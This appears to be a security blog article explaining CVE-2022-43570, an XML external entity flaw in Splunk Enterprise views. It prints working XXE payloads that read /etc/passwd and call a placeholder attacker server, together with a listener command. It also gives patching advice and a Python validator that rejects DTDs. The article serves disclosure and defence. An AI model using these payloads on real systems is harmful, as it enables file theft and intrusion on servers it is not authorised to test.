Splunk Enterprise is one of the most popular platforms for searching, monitoring, and analyzing machine-generated big data. But sometimes, security vulnerabilities pop up even in big, trustworthy platforms. CVE-2022-43570 is one such flaw. In this article, we’ll break down what it is, how it works, and show you step-by-step how an attacker can use a seemingly harmless XML feature to expose sensitive information in Splunk.

What is CVE-2022-43570?

CVE-2022-43570 is an XML External Entity (XXE) Injection bug discovered in Splunk Enterprise versions below 8.1.12, 8.2.9, and 9.0.2. If a logged-in user can upload or create custom “Views” (the Splunk feature for building dashboards), they can trick Splunk Web into parsing XML with dangerous external entities.

In plain English: an attacker makes Splunk’s View system read files on the server or send secret data to an outside server just by uploading some crafty XML code.

Official References

- Splunk Security Advisory: SVD-2022-1107 - Splunk Enterprise XML External Entity Injection
- CVE Database Entry: NIST NVD - CVE-2022-43570
- XXE explained: OWASP XXE Cheat Sheet

Entities in XML look like this

<!ENTITY secret SYSTEM "file:///etc/passwd">

That line says, “wherever you see &secret;, replace it with the contents of /etc/passwd.” If the parser processes it, it might leak files from the server.

Write a view XML that loads an external file

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<view>
  <label>Malicious XXE View</label>
  <description>&xxe;</description>
  <row>
    <panel>
      <html>
        <![CDATA[
          <div>Splunk is leaking: &xxe;</div>
        ]]>
      </html>
    </panel>
  </row>
</view>

*What does this do?*
When Splunk parses this view, it will try to replace &xxe; with the contents of /etc/passwd. On error, Splunk Web might show this data in error messages.

Get the Data

If successful, Splunk’s web UI will crash or error, showing the file you targeted, like parts of /etc/passwd, in the error detail.

You can also force Splunk to fetch files _from_ your server using a URL. Example

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://your-attacker-server.com/data">
]>
<view>
  ...
  <description>&xxe;</description>
  ...
</view>

Set up a simple web server (Python)

python3 -m http.server 800

When the Splunk server tries to load the View, it will make a request to you. At a minimum you now know that the server made the request, and sometimes the request headers give you more information.

- Reading server files (like passwords, configs)
- Port scanning (using file:// or http:// to knock on server addresses)
- Sending data to attackers (even if Splunk can't resolve the reference, error messages could leak data into error logs or the UI)

- Upgrade! Splunk patched XXE in 8.1.12, 8.2.9, and 9.0.2.
- Limit who can edit/upload views.
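As a defensive counterpart to the payloads above, here is an added example (not Splunk's own code) of the check a view-upload handler can apply: walk the XML with the standard-library expat parser and refuse any DOCTYPE, entity declaration or external entity reference before the document is ever parsed for content. Both view samples are constructed; `SAFE_VIEW` is a harmless dashboard and `XXE_VIEW` reproduces the payload shape from this article.

```python
import xml.parsers.expat as expat
from xml.etree import ElementTree as ET


class UnsafeXMLError(ValueError):
    """View XML carried a DOCTYPE, an entity declaration or an external reference."""


def check_no_dtd(xml_text: str) -> None:
    """Abort on the first DTD construct expat reports (malformed XML raises ExpatError).
    Callbacks rather than a regex, so '<!DOCTYPE' inside a comment or CDATA is not a hit."""
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise UnsafeXMLError(f"DOCTYPE not allowed in view XML (root={name!r})")
    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        raise UnsafeXMLError(f"entity declaration not allowed: {name!r}")
    def on_external_ref(context, base, system_id, public_id):
        raise UnsafeXMLError(f"external entity reference blocked: {system_id!r}")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.Parse(xml_text, True)  # exceptions raised in the callbacks propagate here


def is_safe_view(xml_text: str) -> bool:
    try:
        check_no_dtd(xml_text)
        return True
    except UnsafeXMLError:
        return False


def load_view(xml_text: str) -> dict:
    """Validate first, then parse and return the fields a dashboard list shows."""
    check_no_dtd(xml_text)
    root = ET.fromstring(xml_text)
    return {"label": root.findtext("label"), "description": root.findtext("description")}


# Constructed sample: a harmless view whose CDATA merely mentions a DOCTYPE.
SAFE_VIEW = """<view><label>Login failures</label><description>Failed logins per host</description>
<row><panel><html><![CDATA[<p>The text "<!DOCTYPE" is harmless here</p>]]></html></panel></row></view>"""

# Constructed sample reproducing the payload shape from this article (negative case).
XXE_VIEW = """<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<view><label>x</label><description>&xxe;</description></view>"""
```

Rejecting every DTD, not just external entities, is the simplest policy for user-supplied dashboard XML because Splunk views never need one.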

Summary

CVE-2022-43570 is a real-world example of how “just XML” can become dangerous in the wrong hands. All an attacker needs is a Splunk login with “View” permissions. And while patched versions are not affected, millions still run outdated Splunk.

If you have Splunk, please patch ASAP.
If you’re a pentester, try this on test labs (never on live systems you don’t own) and report responsibly.

Further Reading

- Splunk Blog: Security Advisories
- OWASP: XXE Basics
- Mitre CVE Entry

Stay safe! If you found this helpful, don’t forget to test your Splunk—and all your XML endpoints—for XXE. Let’s keep our logs secure.

Timeline

Published on: 11/04/2022 23:15:00 UTC
Last modified on: 11/08/2022 19:43:00 UTC